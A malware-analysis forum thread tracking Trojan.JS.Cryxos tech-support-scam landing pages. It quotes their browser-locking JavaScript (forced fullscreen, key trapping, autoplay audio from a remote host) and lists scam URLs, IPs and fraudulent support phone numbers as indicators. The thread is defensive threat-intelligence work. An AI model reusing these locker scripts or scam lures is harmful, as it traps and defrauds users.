Trojan.JS.Cryxos

Forum for analysis and discussion about malware.
Post Reply
User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Trojan.JS.Cryxos

Post by Xylitol » Sat Jul 29, 2017 9:59 am

A fresh landing targeting France, as spotted by malekal https://twitter.com/malekal_morte/statu ... 6680811521 asking for itunes gift cards.
There is an anti 'noscript' to redirect people on a 404 page if javascript is disabled:

Code: Select all

<noscript><meta http-equiv="refresh" content="0; URL=../google.com/index.html"></noscript>
Full screen:

Code: Select all

 //eval if (key == 'jwsf72efuju2') {function toggleFullScreen() {  if (!document.fullscreenElement &&  !document.mozFullScreenElement && !document.webkitFullscreenElement) {  if (document.documentElement.requestFullscreen) {  document.documentElement.requestFullscreen();  } else if (document.documentElement.mozRequestFullScreen) {  document.documentElement.mozRequestFullScreen();  } else if (document.documentElement.webkitRequestFullscreen) {  document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);}}}} 
Full screen if escape key (VK_ESCAPE = 27) is pressed:

Code: Select all

 //eval document.addEventListener('keyup', function(es) {  if (es.keyCode == 27) {   toggleFullScreen();   document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";   }}, false); 
More keys event:
VK_F11 = 122
VK_CONTROL = 17
VK_ALT = 18
VK_RETURN = 13

Code: Select all

 //eval document.addEventListener('keyup', function(e) {  if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {   toggleFullScreen();   document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";   }}, false); 
Image

Code: Select all

http://namemdk.review/fritunes1/
URL scan: https://www.virustotal.com/en/url/e5eba ... 501322170/ (3/65)
File scan: https://www.virustotal.com/en/file/185b ... 501319076/ (3/59)
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan:HTML/Browlock.A

Post by Xylitol » Sat Aug 26, 2017 7:55 pm

Trojan.JS.Cryxos targeting france, trying to fool/scare user to phone 0186264266
https://www.f-secure.com/v-descs/trojan_js_cryxos.shtml
continuing here because similar to my previous post, who's now also detected as Cryxos.

Code: Select all

htxp://www.support.microsoft9023yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/?cid={conversion}&pid={pubfeed}_{subid}&bid={bid}&ip={ip}&city={city}&network=yfrmsrbcls&cid=Iv1vt5Wy31M&pid=76535_68475&bid=0.006&ip=88.88.88.88&city=Gotham&network=yfrmsrbcls
Image
https://www.virustotal.com/en/file/3182 ... 503778932/

The page have a poor french grammar and also audio speech.

Code: Select all

htxp://www.support.microsoft9023yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/assests/french.mp3

ID3 from file:
Artist: TextAloud: IVONA Mathieu22 (French)
Title: 19577024.mp3
Album: Created: 1/6/2017 8:43:22 AM
Year: 2017
Comment: http://www.nextup.com
Genre: Speech
disable right click, attempt to get in full screen, block also some keyCode, display alert() and 'lock' the browser by inserting an iframe who redirect on a http auth.

Code: Select all

htxps://security-error-reported.in/2/chrome/auth.php
www-authenticate=Basic realm="Microsoft has detected suspicious activity from your IP address.Contact microsoft Engineers at 1-800-431-228(Toll Free Australia) or 0-800-069-8527( Toll Free UK) for Technical Assistance for network and secuirty support"
edit:
some others hostile landing:

Code: Select all

hxtp://www.support.microsoft9024yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/
hxtps://we-mn-72.s3.amazonaws.com/gfhre/ts-ie-frgauth/index.htm?n=09-75-18-92-61&red=y&error=
Image
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan:HTML/Browlock.A

Post by Xylitol » Sun Dec 10, 2017 1:38 am

Got one with sound, just a siren sound of 3 seconds, triggered each time the user try to interact with the landing (click on page, press a key, etc...)

Code: Select all

 //eval document.addEventListener('keyup', function(es) {  if (es.keyCode == 27) {   toggleFullScreen();   document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";   }}, false); 
And inline images with data urls:
Image

They seem to always use the same structure with a directory named 'fritunes' for french landings and 'deitunes' for german landings.
Some examples from urlquery:

German:
http://urlquery.net/report/f85e9577-985 ... a869dda4ec
http://urlquery.net/report/3b247b95-7ee ... 80a0074c33
http://urlquery.net/report/5872aefb-300 ... 27ed8d8def
https://urlquery.net/report/284b6de0-fe ... 0259f42b25
https://urlquery.net/report/9e057a27-63 ... b1aa589ff0

French:
https://urlquery.net/report/5fa93541-d1 ... 7e3a3441da
https://urlquery.net/report/193e42e3-08 ... 08c077affb
https://urlquery.net/report/e6fa93f6-98 ... 6322386515
http://urlquery.net/report/15ef1b49-957 ... acc06e3dab

Russian:
https://urlquery.net/report/bdf64aa5-32 ... 1def42cf0b
https://urlquery.net/report/89802663-e8 ... bc6b7e2417
https://urlquery.net/report/fb3a76a3-f5 ... 71534f5485

Image
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan.JS.Cryxos

Post by Xylitol » Sun Dec 10, 2017 10:42 am

You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan.JS.Cryxos

Post by Xylitol » Sun Dec 24, 2017 12:54 am

You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan.JS.Cryxos

Post by Xylitol » Wed Dec 27, 2017 1:19 pm

Code: Select all

tds: http://erotiznet.com/THfQ4b
http://propelle.stream/fritunesexo/

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan.JS.Cryxos

Post by Xylitol » Sat Dec 30, 2017 1:11 pm

Image

Code: Select all

http://188.166.26.60/fr/?t=09%2070%2073%2038%2070&bk=673d079e
https://www.virustotal.com/en/file/6cf5 ... 514638450/
full screen, hide cursor, alert dialog, mp3 playing, inline images, want you to call 09 70 73 38 70 (skype number)
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan.JS.Cryxos

Post by Xylitol » Fri Jan 05, 2018 2:43 pm

Image
redirector: game6666666.com - https://www.virustotal.com/en/url/93f0a ... 515166721/ (0/66)
cryxos: support.microsoft990207afrmscomborbclf8415.com.s3-website.eu-central-1.amazonaws.com - https://www.virustotal.com/en/url/23285 ... 515166632/ (0/66)
win-help-alert.site - https://www.virustotal.com/en/url/696cc ... 515166958/ (2/66)
https://www.virustotal.com/en/ip-addres ... formation/
skype number: 0970731054

Image


Also, erotiznet.com still active
Image
Redirecting on zakonvzakone.bid (5.8.18.5) https://www.virustotal.com/en/url/ff0b8 ... 515155349/ (1/66) you need french IP and firefox as browser to get redirected on usual fake french police nationale warning.

Talked with AWS (ec2-abuse[@]amazonaws.com) they finally took some initiative against cryxos proliferation.
You do not have the required permissions to view the files attached to this post.

Post Reply